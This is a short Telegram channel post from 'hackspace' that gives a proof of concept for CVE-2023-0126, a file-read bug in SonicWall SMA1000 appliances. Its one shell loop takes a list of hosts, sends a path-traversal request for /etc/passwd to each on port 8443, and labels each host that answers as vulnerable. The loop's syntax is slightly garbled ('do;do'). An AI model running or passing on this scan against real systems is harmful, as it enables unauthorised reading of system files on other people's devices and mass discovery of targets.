hackspace
162 subscribers
283 photos
82 videos
25 files
1.03K links
hackspace
Download Telegram
CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC:
cat file.txt| while read host do;do curl -sk "https://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done